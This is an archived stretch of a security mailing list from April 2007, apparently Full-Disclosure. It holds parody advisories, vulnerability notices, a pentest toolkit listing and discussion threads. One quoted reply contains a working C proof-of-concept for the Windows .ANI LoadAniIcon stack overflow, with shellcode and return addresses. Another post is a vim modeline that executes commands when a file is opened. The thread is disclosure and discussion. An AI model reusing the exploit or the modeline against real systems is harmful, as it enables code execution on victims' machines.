From sil at infiltrated.net Sun Apr 1 04:05:40 2007 From: sil at infiltrated.net (J. Oquendo) Date: Sat, 31 Mar 2007 22:05:40 -0500 Subject: [Full-disclosure] Cisco IP Phone vulnerability Message-ID: <20070401030540.GA54469@infiltrated.net> -----BEGIN LSD SIGNED MESSAGE----- Infiltrated.net Security Advisory: Cisco IP Phone Denial of Service http://www.infiltrated.net/ciscoIPPhone7960.html Revision 6.9 For Public Release Summary The Cisco IP Phones are subject to a denial of service. This vulnerability has not yet been documented by Cisco but it should be allocated the bug ID 31337 by staff @ PSIRT This advisory will be posted at http://www.infiltrated.net/ciscoIPPhone7960.html Affected Products All Cisco IP Phones Proof of Concept http://infiltrated.net/7960poc.jpg Cisco Security Procedures Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html All Cisco security advisories are available at http://www.cisco.com/go/psirt. Details Cisco IP Phones are subject to a denial of service. Users who disconnect their ethernet cables will lose their dial tones and their present call will drop as well as subsequent incoming calls. While the attack may be local at present time, security engineers Infiltrated Networks (a division of Fscker Inc. with no relation to Halliburton) are devising telekinetic attacks along with Miss Cleo in order to provide a working disconnection attack tool. Impact All your phone sex belongs to null 0 Software Versions and Fixes The only fix is to plug your phone back into a PoE switch or plug in its power cord. Obtaining Fixed Software Infiltrated Networks and Fscker Inc. is offering its services at the low price of $1000.00 an hour in consulting fees to remedy this attack, with a 100 hour minimum retainer fee. In fact, for those seeking to purchase a PoC code of the mentioned vulnerability, contact us, we'll gladly take your milk money. Workarounds Don't unplug your phone. Don't unplug your PoE switches. Don't live in areas where electricity is sporadic. Don't play with matches, and don't drive while under the influence of anything that is currently mentioned at http://www.bumwine.com Exploitation and Public Announcements Infiltrated.net is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was reported to us losers, by another bigger loser who wishes to retain his or her anonyminity out of fear of obtaining "Michael Lynn Disease" where a frivolous denial of service attack via litigation will ensue and weaken the immune system. Status of This Notice: FINAL This is a final Infiltrated.net advisory. Although we cannot guarantee the accuracy of all statements in this notice, we still passed it on to you the consumer knowing full well a cease and desist letter will be sent and added to our collection. All of the facts have however been checked to the best of our ability while not under the influence of Prozac, Valtrex, Valium, Lithium and lest we forget, weapons of mass destruction of which you will not find since we have them buried in the secret stash boxes of our Nissan, Lexus, WRX, and Cherokee alongside our Glocks. Revision History Revision 6.9 Initial public release This notice is Copyright 2007 by Infiltrated.net. This notice may be redistributed freely after the release date given at the top of the text, provided that redistributed copies are complete and unmodified, and include all date and version information. Pictures of your fiance, wife, girlfriend can be e-mailed to us if said individuals did not yet e-mail to us on their own. Infiltrated Networks, sil, and our oddball affiliates remind those on the security scene to keep it real. From nytrokiss at gmail.com Sun Apr 1 04:58:54 2007 From: nytrokiss at gmail.com (James Matthews) Date: Sat, 31 Mar 2007 20:58:54 -0700 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: References: Message-ID: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com> The issue is that this only works with DEP turned off! On 3/31/07, dev code wrote: > > I didn't include the DoS version of this, it just calls ExitProcess(). If > you have SP2, you can try going to http://sicotik.com/ink/test.html. > Thanks. > > >From: wac > >To: "dev code" > >CC: full-disclosure at lists.grok.org.uk > >Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow > >Date: Sat, 31 Mar 2007 06:53:34 -0500 > > > >Hello: > > > >Does this works in *fully patched* XP pro + SP2? Mine seems to be totally > >immune (not even crashing). XP Pro + SP2 + 0 patches crashes (probably > >landing somewhere else in memory). > > > > > >On 3/30/07, dev code wrote: > >> > >>/* > >>* Copyright (c) 2007 devcode > >>* > >>* > >>* ^^ D E V C O D E ^^ > >>* > >>* Windows .ANI LoadAniIcon Stack Overflow > >>* [CVE-2007-1765] > >>* > >>* > >>* Description: > >>* A vulnerability has been identified in Microsoft Windows, > >>* which could be exploited by remote attackers to take complete > >>* control of an affected system. This issue is due to a stack > >>overflow > >>* error within the "LoadAniIcon()" [user32.dll] function when > rendering > >>* cursors, animated cursors or icons with a malformed header, which > >>could > >>* be exploited by remote attackers to execute arbitrary commands > >>by > >>* tricking a user into visiting a malicious web page or viewing an > >>email > >>* message containing a specially crafted ANI file. > >>* > >>* Hotfix/Patch: > >>* None as of this time. > >>* > >>* Vulnerable systems: > >>* Microsoft Windows 2000 Service Pack 4 > >>* Microsoft Windows XP Service Pack 2 > >>* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) > >>* Microsoft Windows XP Professional x64 Edition > >>* Microsoft Windows Server 2003 > >>* Microsoft Windows Server 2003 (Itanium) > >>* Microsoft Windows Server 2003 Service Pack 1 > >>* Microsoft Windows Server 2003 Service Pack 1 (Itanium) > >>* Microsoft Windows Server 2003 x64 Edition > >>* Microsoft Windows Vista > >>* > >>* Microsoft Internet Explorer 6 > >>* Microsoft Internet Explorer 7 > >>* > >>* This is a PoC and was created for educational purposes only. The > >>* author is not held responsible if this PoC does not work or is > >>* used for any other purposes than the one stated above. > >>* > >>* Notes: > >>* For this to work on XP SP2 on explorer.exe, DEP has to be > turned > >>* off. > >>* > >>*/ > >>#include > >> > >>/* ANI Header */ > >>unsigned char uszAniHeader[] = > >>"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" > >>"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" > >>"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" > >>"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" > >>"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" > >>"\x61\x6E\x69\x68\xA8\x03\x00\x00"; > >> > >>/* Shellcode - metasploit exec calc.exe ^^ */ > >>unsigned char uszShellcode[] = > >>"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" > >>"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42" > >>"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32" > >>"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a" > >>"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c" > >>"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57" > >>"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50" > >>"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d" > >>"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f" > >>"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a" > >>"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76" > >>"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65" > >>"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78" > >>"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f" > >>"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65" > >>"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d" > >>"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31" > >>"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69" > >>"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61" > >>"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70" > >>"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42"; > >> > >>char szIntro[] = > >>"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n" > >>"\t\t\tdevcode (c) 2007\n" > >>"[+] Targets:\n" > >>"\tWindows XP SP2 [0]\n" > >>"\tWindows 2K SP4 [1]\n\n" > >>"Usage: ani.exe "; > >> > >>typedef struct { > >> const char *szTarget; > >> unsigned char uszRet[5]; > >>} TARGET; > >> > >>TARGET targets[] = { > >> { "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */ > >> { "Windows 2K SP4", "\x29\x4C\xE1\x77" } > >>}; > >> > >>int main( int argc, char **argv ) { > >> char szBuffer[1024]; > >> FILE *f; > >> > >> if ( argc < 3 ) { > >> printf("%s\n", szIntro ); > >> return 0; > >> } > >> > >> printf("[+] Creating ANI header...\n"); > >> memset( szBuffer, 0x90, sizeof( szBuffer ) ); > >> memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); > >> > >> printf("[+] Copying shellcode...\n"); > >> memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); > >> memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - > 1 > >>); > >> > >> printf("%s\n", argv[2] ); > >> f = fopen( argv[2], "wb" ); > >> if ( f == NULL ) { > >> printf("[-] Cannot create file\n"); > >> return 0; > >> } > >> > >> fwrite( szBuffer, 1, 1024, f ); > >> fclose( f ); > >> printf("[+] .ANI file succesfully created!\n"); > >> return 0; > >>} > >> > >>_________________________________________________________________ > >>Interest Rates near 39yr lows! $430,000 Mortgage for $1,399/mo - > Calculate > >>new payment > >> > >> > http://www.lowermybills.com/lre/index.jsp?sourceid=lmb-9632-18466&moid=7581 > >> > >>_______________________________________________ > >>Full-Disclosure - We believe in it. > >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >>Hosted and sponsored by Secunia - http://secunia.com/ > >> > > _________________________________________________________________ > Live Search Maps ? find all the local information you need, right when you > need it. http://maps.live.com/?icid=hmtag2&FORM=MGAC01 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070331/662845ce/attachment.html From sandr8 at gmail.com Sun Apr 1 05:07:39 2007 From: sandr8 at gmail.com (alessandro salvatori) Date: Sat, 31 Mar 2007 21:07:39 -0700 Subject: [Full-disclosure] Cisco IP Phone vulnerability In-Reply-To: <20070401030540.GA54469@infiltrated.net> References: <20070401030540.GA54469@infiltrated.net> Message-ID: <517e86fb0703312107p2366ea36g35d37cbed9e90c73@mail.gmail.com> Hey it is still March 31st in CA! -- A l e s s a n d r o S a l v a t o r i On 3/31/07, J. Oquendo wrote: > -----BEGIN LSD SIGNED MESSAGE----- > > Infiltrated.net Security Advisory: > Cisco IP Phone Denial of Service > http://www.infiltrated.net/ciscoIPPhone7960.html > Revision 6.9 > > For Public Release > > Summary > The Cisco IP Phones are subject to a denial of > service. > > This vulnerability has not yet been documented > by Cisco but it should be allocated the bug ID > 31337 by staff @ PSIRT > > This advisory will be posted at > http://www.infiltrated.net/ciscoIPPhone7960.html > > Affected Products > All Cisco IP Phones > > Proof of Concept > http://infiltrated.net/7960poc.jpg > > Cisco Security Procedures > Complete information on reporting security > vulnerabilities in Cisco products, obtaining > assistance with security incidents, and > registering to receive security information from > Cisco, is available on Cisco's website at > http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html > All Cisco security advisories are available at > http://www.cisco.com/go/psirt. > > > Details > Cisco IP Phones are subject to a denial of service. > Users who disconnect their ethernet cables will > lose their dial tones and their present call will > drop as well as subsequent incoming calls. > > While the attack may be local at present time, > security engineers Infiltrated Networks (a division > of Fscker Inc. with no relation to Halliburton) > are devising telekinetic attacks along with Miss > Cleo in order to provide a working disconnection > attack tool. > > > Impact > All your phone sex belongs to null 0 > > Software Versions and Fixes > The only fix is to plug your phone back into a PoE > switch or plug in its power cord. > > Obtaining Fixed Software > Infiltrated Networks and Fscker Inc. is offering > its services at the low price of $1000.00 an hour > in consulting fees to remedy this attack, with a > 100 hour minimum retainer fee. In fact, for those > seeking to purchase a PoC code of the mentioned > vulnerability, contact us, we'll gladly take your > milk money. > > Workarounds > Don't unplug your phone. Don't unplug your PoE > switches. Don't live in areas where electricity > is sporadic. Don't play with matches, and don't > drive while under the influence of anything that > is currently mentioned at http://www.bumwine.com > > Exploitation and Public Announcements > Infiltrated.net is not aware of any public > announcements or malicious use of the > vulnerability described in this advisory. > > This vulnerability was reported to us > losers, by another bigger loser who wishes > to retain his or her anonyminity out of > fear of obtaining "Michael Lynn Disease" > where a frivolous denial of service attack > via litigation will ensue and weaken the > immune system. > > Status of This Notice: FINAL > This is a final Infiltrated.net advisory. Although > we cannot guarantee the accuracy of all statements > in this notice, we still passed it on to you the > consumer knowing full well a cease and desist letter > will be sent and added to our collection. All of the > facts have however been checked to the best of our > ability while not under the influence of Prozac, > Valtrex, Valium, Lithium and lest we forget, weapons > of mass destruction of which you will not find since > we have them buried in the secret stash boxes of our > Nissan, Lexus, WRX, and Cherokee alongside our Glocks. > > > Revision History > Revision 6.9 Initial public release > > > > This notice is Copyright 2007 by Infiltrated.net. > This notice may be redistributed freely after the > release date given at the top of the text, > provided that redistributed copies are complete > and unmodified, and include all date and version > information. Pictures of your fiance, wife, > girlfriend can be e-mailed to us if said > individuals did not yet e-mail to us on their > own. Infiltrated Networks, sil, and our oddball > affiliates remind those on the security scene to > keep it real. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From aviram at beyondsecurity.com Sun Apr 1 06:18:39 2007 From: aviram at beyondsecurity.com (Aviram Jenik) Date: Sun, 1 Apr 2007 01:18:39 -0400 Subject: [Full-disclosure] ISP in the UK Terminates Account after Full Disclosure Message-ID: <200704010118.39798.aviram@beyondsecurity.com> Short version: beThere, a UK ISP distributed routers to customers with the telnet port open and a default administrator password. A bit embarrassing. Sid, who discovered the hole, originally blogged about it on SecuriTeam blogs, which resulted in the ISP calling us within 24 hours to have Sid take down the password information (as if that can't be figured out by the average script kiddie), but a month and a half later the problem is still there. I guess we know where their priorities are. What else didn't take them long to do? Terminating Sid's Internet account. Yeah, that'll teach him a lesson telling the world about security holes in beThere's service. Bad customer. Go bother someone else. Oh, and the backdoor? Still there, thanks for asking. My longer rant here: http://blogs.securiteam.com/index.php/archives/860 And here's Sid's original disclosure: http://blogs.securiteam.com/index.php/archives/826 - Aviram From druid at caughq.org Sun Apr 1 07:16:16 2007 From: druid at caughq.org (I)ruid) Date: Sun, 01 Apr 2007 01:16:16 -0500 Subject: [Full-disclosure] CAU-2007-0001: Window Transparency Information Disclosure Message-ID: <1175408177.2463.24.camel@localhost> ____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Security Advisory ===============/======================================================== Advisory ID: CAU-2007-0001 Release Date: 04/01/2007 Title: Window Transparency Information Disclosure Application/OS: Windows made from silica or plastics Topic: Panes used in windows are usually transparent, allowing sensitive information to be observed from the outside. Vendor Status: Not Notified Attributes: Remote, Information Disclosure Advisory URL: http://www.caughq.org/advisories/CAU-2007-0001.txt Author/Email: I)ruid ===============/======================================================== Overview ======== An information disclosure attack can be launched against buildings that make use of windows made of glass or other transparent materials by observing externally-facing information through the window. Impact ====== Sensitive information stored on whiteboards, cork-boards, calendars, post-it notes, or other medium which faces a window is susceptible to being disclosed to a remote entity. Affected Systems ================ 1) Silica Windows 2) Plastic Windows Technical Explanation ===================== Silica-based (glass) windows have molecular structures that are very random like a liquid yet retain the strong bond and rigidity of a solid. Transparent and translucent plastic windows have molecular structures wherein the long-chain molecules (polymers) in the plastic are made to settle into a similarly random pattern. These random patterned molecular structures have electrons that do not absorb the energy of photons in the visible spectrum, thus allowing visible light to traverse them. This traversal of visible light allows the human eye to observe an object through the window. Solutions & Recommendations ========================== 1) Do not store sensitive information on any medium which faces a window. 2) Draw blinds or curtains over the vulnerable window so as to prevent remote observers from viewing any sensitive information. 3) Apply an opaquing layer to vulnerable windows. Exploitation ============ Use the naked eye, binoculars, or a telescoping lens to peer through the windows of your target building. Locate information storing mediums such as whiteboards, cork-boards, or post-it notes which face outward through the window. Read the medium's content. References ========== Howstuffworks "What makes glass transparent?" http://science.howstuffworks.com/question404.htm Credits & Gr33ts ================ Computer Academic Underground Prof. Julius Sumner Miller -- I)ruid, C?ISSP druid at caughq.org http://druid.caughq.org -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/9bcdcdb7/attachment.bin From vcomics at yahoo.ca Sun Apr 1 08:26:30 2007 From: vcomics at yahoo.ca (V Comics) Date: Sun, 1 Apr 2007 03:26:30 -0400 (EDT) Subject: [Full-disclosure] April 1 joke Message-ID: <969102.78862.qm@web63807.mail.re1.yahoo.com> vim: foldmethod=expr:foldexpr=feedkeys("\\\\x3a%!cat\\x20-n\\\\\\x 3a%s/./\:)/g\\\\\\x3aq!\\"): a --------------------------------- Ask a question on any topic and get answers from real people. Go to Yahoo! Answers. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/d2f6ee50/attachment.html From tecklord at argocom.cv.ua Sun Apr 1 10:59:01 2007 From: tecklord at argocom.cv.ua (Valery Marchuk) Date: Sun, 1 Apr 2007 12:59:01 +0300 Subject: [Full-disclosure] Maria Sharapova is a Cisco Certified Specialist Message-ID: <0ab501c77444$633abb20$030414ac@pc> Maria Sharapova, one of the most famous tennis players, gained the CCIE status yesterday. More at http://www.securitylab.ru/news/extra/293608.php From Larry at larryseltzer.com Sun Apr 1 12:49:58 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Sun, 1 Apr 2007 07:49:58 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com> References: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com> Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> >>The issue is that this only works with DEP turned off! Interesting point. I haven't seen this mentioned anywhere, including the Microsoft advisory (http://www.microsoft.com/technet/security/advisory/935423.mspx). Has anyone actually tested this with DEP on/off to be sure? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry_seltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com From research at matousec.com Sun Apr 1 08:38:55 2007 From: research at matousec.com (Matousec - Transparent security Research) Date: Sun, 01 Apr 2007 09:38:55 +0200 Subject: [Full-disclosure] Norton Multiple insufficient argument validation of hooked SSDT function Vulnerability Message-ID: <460F618F.1040803@matousec.com> Hello, We would like to inform you about a vulnerability in Symantec Norton products. Description: Symantec Norton Personal Firewall hooks many functions in SSDT and in at least two cases it fails to validate arguments that come from the user mode. User calls to NtCreateMutant and NtOpenEvent with invalid argument values can cause system crashes because of errors in Norton driver SPBBCDrv.sys. Further impacts of this bug (like arbitrary code execution in the kernel mode) were not examined. Vulnerable software: * Norton Personal Firewall 2006 version 9.1.1.7 * Norton Personal Firewall 2006 version 9.1.0.33 * probably all versions of Norton Personal Firewall 2006, Norton Internet Security 2006 and other products that use SPBBCDrv driver * possibly older versions of Norton Personal Firewall and Norton Internet Security More details and a proof of concept including its source code are available here: http://www.matousec.com/info/advisories/Norton-Multiple-insufficient-argument-validation-of-hooked-SSDT-functions.php Regards, -- Matousec - Transparent security Research http://www.matousec.com/ From fred.frazao at fredericofrazao.com Sun Apr 1 12:11:58 2007 From: fred.frazao at fredericofrazao.com (Fred) Date: Sun, 01 Apr 2007 12:11:58 +0100 Subject: [Full-disclosure] Kcpentrix 2.0 is Out !! Message-ID: <1175425918.21398.31.camel@Fred> Dear List, The Kcpentrix Project was founded in May 2005 , KCPentrix 1.0 was liveCD designed to be a standalone Penetration testing toolkit for pentesters, security analysts and System administrators What's New in KcPentrix 2.0: Now release 2.0 is a liveDVD, It features a lot of new or up to date tools for auditing and testing a network, from scanning and discovering to exploiting vulnerabilities Kcpentrix is based on SLAX 5, a Slackware live Dvd The Powerful modularity which Kcpentrix uses, allow us to easily customize our version, and include whichever modules we need. KCPENTRIX 2.0 is the most inovative and promising KCPENTRIX ever. It switched to 2.6 kernel line. Zisofs compression was replaced by SquashFS, which provides better compression ratio and higher read speed. Tools Lis: Server tools : Mysql PostgreSQL apache php DNS DHCP FTP SMTP POP3 IMAP SSH TFTPD Internet tools: Skype Fire fox Gftp Gaim Arp: arping-2.04 seringe arp-sk arpspoof backdoors: hbkdr.tar.gz hbkdr.zip sbd-1.37.tar.gz ssheater-1.1.tar.gz x86-linux-connectback.c x86-linux-portbind.c Bruteforce: adsmb-0.3 adsnmp-0.1 brutus-0.9.2 crackcvspass-v0.1 john-1.7.2 Online_Rainbow onesixtyone-0.3.2 nat-1.0.4 mdcoll lodowep SIPcrack-0.1 smbat TFTP-bruteforce VNCcrack-0.9.1 wyd crunch md5crack.pl ophcrack thc-pptp-bruter vncrack cisco: brute-enable-v.1.0.2 cisco-auditing-tool-v.1.0 cisco-global-exploiter cisco-scanner-v.1.3 cisco-torch-0.4b ciscopack copy-router-config-v.0.1 eigrp-tools ios-w3-vul ios7decrypt-v.1.1 jitney-0.10 database: sqlbrute.py bsqlbf.pl mysql_bftools metacoretex-0.8.0 oat oscanner_bin checkpwd sidguess tnscmd10g.pl bfora.pl dbcool_audit.pl oracletest.pl tnsprobe.sh oracle-scanner-v.1.0.6 oracle-dump-sids-v0.0.1 oat-v.1.3.1 enumeration: dnswalk DNSBruteforce.py dns-ptr dnsenum dnsmap dns-predict-v.0.0.2 fingergoogle-1.1 googrape-v.0.1 gooscan-v0.9 goog-mail.py qgoogle.py google-search dnspython-1.3.2 dnslib.py httplib.py inet-enum.py isr-form-1.0 ldap-enum-v.003 ldapbrowser list-urls lsrtunnel-0.2.1 mibble-2.6 mibble-2.7 nmbscan-1.2.4 nstx relayscanner revhosts smb-enum smtp-vrfy snmpenum.pl httprint_301 exploits: client-side exploit-tree framework-2.5 framework-2.6 framework-2.7 framework3 Beta framework-3.0 microsoft milw0rm packetstorm secfocus win32 Bin?s Firewall: ftester-1.0 Morena hping2 forensics: autopsy-2.06 sleuthkit sleuthkit-2.03 Fuzzers: bed bed-v.0.5 cirt-fuzzer clfuzz fuzzer-1.1 fuzzer-1.2 fuzzer-mod mistress Peach pirana-0.2.1 snmp-fuzzer-0.1.1 spike IDS: nemesis snort ossec misc-tools: find_ddos3.1 fping-2.4b2 ipgenv2 printer: hijetter pft proxies: 3proxy_0_5_2 paros penproxy-0.4.10 scanners: banshee-3.3 dcom_scanner hydra-5.3 knocker-0.7.1 lsrscan-1.0 ike-scan amap nikto-1.35 pbnj nbtscan nmap nmapfe sinfp.pl VNC_bypauth Sniffers: aimsniff-0.9d aimsniff-1.0beta PHoss xspy dsniff p0f wireshark spoofing: netsed tunnelling: 3proxy iodine-0.3.2 proxytunnel-1.6.3 Web: asp-audit metoscan04 proxyfinder-1.0 sqlibf sqlinject-1.1 wal easy-scraper.pl hacker_webkit.tar.gz mysql-miner.pl put.pl wireless: aircrack-2.2-beta1 aircrack-ng-0.6.2 airpwn-1.3 airsnarf-0.2 asleap-1.4 wifitap hotspotter-0.4 fakeap-0.3.2 cowpatty-2.0 wep_crack wep_decrypt windows-binaries: - databases : Absinthe-1.4.1-Linux sqlexec20.exe -Misc : enumplus exe2bat.exe Fport.exe klogger.exe mbenum.exe radmin.exe plink.exe nc.exe nbtenum.exe mstsc.exe regdmp.exe sbd.exe tftpd32.exe vnc-ssh vncviewer.exe WHOAMI.EXE wget.exe - pstools pstoreview.exe pssuspend.exe psshutdown.exe psservice.exe pskill.exe pslist.exe psloggedon.exe psloglist.exe pspasswd.exe Psinfo.exe psgetsid.exe psfile.exe psexec.exe - passwd-attack: ipcscan lbrute smbcrack2 cachedump FindPass.exe pulist.exe PWDump4.exe SAMDUMP.EXE tsgrinder-2.03.zip TSgrinder.rar -Scanners : hscan ipcscan languard ntscangui retina-scanners DSScan.exe dfind.exe CIScan.exe X-Scan-v2.3-en superscan gdiscan.exe HS_WINS MS05039Scan.exe MyDoomScanner.exe SQLScan.exe SNScan.exe sl.exe RPCScan2.exe NetSchedScan.exe SynScan -sniffers rawsniffer ngrep.exe -trojans : sbd.exe Institution_2004.zip -vpn: ike-scan ikeprobe Thanks to all beta testers and supporters, special thanks to the friends from Security-database.com and SecurityDistro.com You can Download the iso @ Kcpentrix.com / knowledgecave.com and Securitydistro.com. Best regards, Fred aka HC From giorgio.fedon at gmail.com Sun Apr 1 14:52:59 2007 From: giorgio.fedon at gmail.com (Giorgio Fedon) Date: Sun, 1 Apr 2007 15:52:59 +0200 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: References: Message-ID: Hi Max, you are promoting Software Piracy. Like a group of warez people so called - "Team IND" 2007/3/30, Max Moser : > > Dear List > > During the last year, rumours had come to my attention that apparently > it is possible to transform a standard 30USD Bluetooth(r) dongle into > a full-blown Bluetooth(r) sniffer. Thinking you absolutely need > Hardware to be able to hop 79 channels 1600 times a second I was > rather suspicious about these claims. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/d78d41ea/attachment.html From jf at danglingpointers.net Sun Apr 1 23:04:28 2007 From: jf at danglingpointers.net (jf) Date: Sun, 1 Apr 2007 22:04:28 +0000 (UTC) Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: References: Message-ID: Hi, You missed the point completely. He's not promoting software piracy but showing that the high-dollar bluetooth sniifers are not required and that you're average dongle can do everything that a proprietary product can. Also, if your going to make thinly veiled adverts for a group, you should probably ensure that they are findable via google or similar. On Sun, 1 Apr 2007, Giorgio Fedon wrote: > Date: Sun, 1 Apr 2007 15:52:59 +0200 > From: Giorgio Fedon > To: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] Busting The Bluetooth Myth > > Hi Max, you are promoting Software Piracy. > Like a group of warez people so called - "Team IND" > > 2007/3/30, Max Moser : > > > > Dear List > > > > During the last year, rumours had come to my attention that apparently > > it is possible to transform a standard 30USD Bluetooth(r) dongle into > > a full-blown Bluetooth(r) sniffer. Thinking you absolutely need > > Hardware to be able to hop 79 channels 1600 times a second I was > > rather suspicious about these claims. > > From giorgio.fedon at gmail.com Sun Apr 1 16:17:05 2007 From: giorgio.fedon at gmail.com (Giorgio Fedon) Date: Sun, 1 Apr 2007 17:17:05 +0200 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: References: Message-ID: | Hi, | | You missed the point completely. He's not promoting software piracy but | showing that the high-dollar bluetooth sniifers are not required and that | you're average dongle can do everything that a proprietary product can. The "thinly veiled advert" was to mention that either: 1. He is using a pireted version of the bluetooth sniffer; 2. He has downloaded a pirated version of the bluetooth sniffer and printed a pdf of the readme inside; 3. He is the author of the pirated version of the bluetooth sniffer. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/66c568ae/attachment.html From devcode29 at hotmail.com Sun Apr 1 16:05:37 2007 From: devcode29 at hotmail.com (dev code) Date: Sun, 01 Apr 2007 15:05:37 +0000 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> Message-ID: I made a mistake in including "jmp esp" for XP SP2 because the stack cannot be executed (due to DEP of course :P). It is completely possible to execute shellcode if we can do some DEP bypass (ie. ret2libc attack, etc..) to add execute access to the stack and jmp to our code. My PoC i updated yesterday (added as an attachment to the full disclosure post) returns to ExitProcess() and closes explorer.exe upon viewing the .ani file, just to show that it is possible to do our own shiznat in SP2. >From: "Larry Seltzer" >To: >Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow >Date: Sun, 1 Apr 2007 07:49:58 -0400 > > >>The issue is that this only works with DEP turned off! > >Interesting point. I haven't seen this mentioned anywhere, including the >Microsoft advisory >(http://www.microsoft.com/technet/security/advisory/935423.mspx). > >Has anyone actually tested this with DEP on/off to be sure? > >Larry Seltzer >eWEEK.com Security Center Editor >http://security.eweek.com/ >http://blog.eweek.com/blogs/larry_seltzer/ >Contributing Editor, PC Magazine >larryseltzer at ziffdavis.com > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ _________________________________________________________________ Exercise your brain! Try Flexicon. http://games.msn.com/en/flexicon/default.htm?icid=flexicon_hmemailtaglinemarch07 From jammer128 at gmail.com Sun Apr 1 16:57:17 2007 From: jammer128 at gmail.com (Jason Miller) Date: Sun, 1 Apr 2007 10:57:17 